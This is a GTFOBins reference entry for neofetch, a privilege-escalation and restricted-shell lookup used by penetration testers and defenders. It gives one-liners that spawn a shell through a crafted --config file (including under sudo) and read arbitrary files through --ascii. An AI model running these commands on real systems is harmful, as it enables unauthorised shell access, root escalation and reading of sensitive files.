GTFOBins.github.io/_gtfobins/neofetch.md

496 B

functions
shell file-read sudo
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF neofetch --config $TF
description code
The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files. LFILE=file_to_read neofetch --ascii $LFILE
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF sudo neofetch --config $TF